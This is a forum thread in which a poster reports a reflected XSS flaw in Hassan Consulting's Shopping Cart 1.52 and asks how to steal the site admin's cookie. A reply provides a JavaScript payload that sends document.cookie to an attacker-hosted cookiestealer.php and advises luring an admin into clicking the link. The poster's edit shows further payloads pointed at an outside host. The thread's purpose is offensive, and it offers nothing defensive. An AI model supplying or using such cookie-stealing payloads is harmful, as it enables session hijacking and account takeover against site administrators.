XSS help

hey guys I just found out that Hassan Consulting's Shopping Cart Version 1.52 is vulnerable to XSS, i was just playing around when i got to this page thats like markup/cgi-local/shop.pl/page= so i tried markup/cgi-local/shop.pl/page=<script>alert('XSS')</script> and i got an alert box saying XSS. so i was wondering if you guys could help me out a little bit cause I am not much familier with XSS how do i get the admin's cookie, i have a cookie stealer on my site.

And I was wondering if its possible to view file's content by doing markup/cgi-local/shop.pl/file=the directory of the files and the alert box works with this too markup/cgi-local/shop.pl/file=<script>alert('XSS')</script>

Well, you could use this script:

window.location="http://www.yourhost.com/cookiestealer.php?"+document.cookie

where cookiestealer.php takes address line input, like GET and saves it to a log file.

Then, you just get an admin to click that link.

ok i'll try that , thanks alot

EDIT: Ok i tried it but it doesnt work markupcgi-local/shop.pl/page=<script>window.location('http://projectx.t35.com/about.php?c='+ document.cookie</script> and this cgi-local/shop.pl/page=<script>window.location="http://projectx.t35.com/about.php?c="+document.cookie</script> thats what i typed and nothing happens